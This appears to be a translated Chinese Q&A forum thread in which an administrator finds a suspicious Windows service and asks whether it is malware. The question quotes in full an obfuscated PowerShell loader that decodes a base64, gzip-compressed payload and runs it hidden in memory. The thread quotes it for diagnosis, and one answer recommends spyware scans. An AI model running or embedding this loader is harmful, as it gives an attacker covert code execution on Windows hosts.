(如果我将此发布到了错误的交流中,请原谅我)。
今天早上,我们的一台服务器因发电机测试而出现问题。仔细检查服务后,我们发现一项服务无法启动,于是我们立即启动了该服务。
然而,在列表的下方,我遇到了一个看起来非常奇怪的服务,其显示名称为yxEnkdrZymWygFLx。该服务是手动的,仔细检查后发现包含以下内容:
C:\WINDOWS\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden
-c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+
'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop
-w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String
(''H4sIAP3mZVQCA71WbW/aSBD+nEr9D1aFZFvngB1I8yJVOtuEAMG8mUASiqLFXpuFt
ZfYa17a63+/MdgJvaS9Xj+cFZT1zszu7PM8M2svCR1OWChMZ7Hd6OHHeDEUvr5/d9RFE
QoEqbA6rShCYYWdvunO5aMjMBXCiDmV4YasH1FH+CRIY325rLIAkXByeWkmUYRDvn8vX
mOuxzEOppTgWJKFv4TRDEf4uDOdY4cLX4XCY/GasimimdvWRM4MC8d66Ka2FnNQml/RX
lLCJfHzZ1EeH2uT4tVTgmgsifY25jgoupSKsvBNTjccbJdYEi3iRCxmHi+OSFg+Kd6GM
fJwG1ZbYQvzGXNjUYbTwF+EeRKFwnfnShfau0kiDLtg0l03wjFEFRvhii2wVAgTShXhT
2mcZdFPQk4CDHaOI7a0cbQiDo6LdRS6FPexN5HaeJ0f/leDpMMg8OrySFaAmp+kazE3o
Xi/gii/TjilVYbngFrA4tv7d+/febki5vXG6lAKMDoa78YYEpW6LCY7v0+CqggWbIU4i
7bwWhhECZYnwjglYjyZCIXNde+iayTKj5fQcn/w5t1kfW+cYwbz4yEj7gTiMqoK86dH2
muklh+Lroo9EuLqNkQBcXJdSW9Bjz2Kd6ct5m5tyE0SMwN2q5hiH/EUREUYvw67Cgh/j
jUSQl0c6Q7QF0NWwKz8fTJ7XiSxEVo4ALT27yLQ4IGace6dKXib756+g5NoUhTHitBNo
JwcRbAxothVBD2MSWbSE852Q/ElXSuhnDgo5vlyE/kFyWxHk4UxjxIHKITTD+wldgiiK
RiKUCcuNrY28fOdxTehMBGlJPRhpRVQATMpBDZPhRFBkrkI5KKNeSNYUhyA2664axT5U
MpZIezEhHzsiq/TzCW+13MKSY7FQZLAs00ZV4QhiTh0iRTeZ039diIHfSJLyYxwxo2UF
8/Y2PJU8gWUXFxp2lm9dZaqO0drh03EAZdaxAIDxfhjxeYRoCZ9KHXItQ7PfSOklttcE
K2xhp8Fv1tSbrDqmXvTnNdLlmPG3evauU7W/to5b+uOR85rzTvw6xG1cU7UdQ932je6W
+sTbeHrbqdl9+fz7lXQajdiQ8vW2Mc6lUr9TtXL5UqnrC5c3Lwnmr/Q3XZA1psWjJ003
oA4tUGvmmZ/OjqpPYxovVSpzbwRi+2PFeqiqrXVdYO5ZWt7p/XZoO4ERqk0TJq6AUdab
mr9HjIDHa2rJW1o9G5rhn57ZfRQh3XLf8Dcg/tkjPwbZ33vIb2ht5ej5mnAekPqQkUP1
XuvNJw5hlrtXnTM+l2MuqbG6LSkjZiO/P5oeOKbJ87MK12MWu1gqSNd70E+I+QbbHTTH
5xC/EJrP+m1h8GL762x3obXM+9BO7OsTx9SkoHlwhd/07HCxwPaftShLRTFM0SBTmi5e
XHVWFTLWmiXkTRCkg4v1wWOQkzhQoIrK1eoTilz0p6+67lwn+y7/ATq7BaG5ZM3R7Lw7
Ci/9Ph86vLyAZIFuR9IsdjCoc9niropqyp0bXVTUeHYv35Oky230uGKStr8c8j+sRndb
SandVHYToe4NrhQ60//C65Zac7gn/tvuL7M/cT6S1iryjMSryzfT/wn0H8XhBEiHAJsa
C8U7y++t7HI5HTwnfBCF2jFy570662T8OM2fET8DZUmEcA4CgAA''));IEX (New-Obj
ect IO.StreamReader(New-Object IO.Compression.GzipStream($s,
[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';
$s.UseShellExecute=$false;$p=[System.Diagnostics.Process]::Start($s);
(请注意,我将其分成几行以使其更易于阅读)。
该服务本身的名称为,LzCNTZuKGyV并且是在本地系统帐户下运行的手动进程。(我暂时禁用了该进程,直到我明白它是什么)。
我检查了服务器的注册表,发现了几个“遗留”驱动程序条目,全部指向该服务:
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_LZCNTZUKGYV]
"NextInstance"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_LZCNTZUKGYV\0000]
"Service"="LzCNTZuKGyV"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="yxEnkdrZymWygFLx"
我的问题:
- 以前有人见过这样的事情吗?
- 这可能是某种形式的病毒/木马服务吗?
- 有没有办法翻译上面代码中的 Base 64 内存流?
答案1
8ECC055D-047F-11D1-A537-0000F8753ED1 适用于系统保留的非 PNP 类驱动程序。
一些 sypware 应用程序可能会利用它危害您的浏览器并打开后门。
最好扫描系统中的间谍软件。使用超级反间谍软件和 TDSSKiller 运行扫描。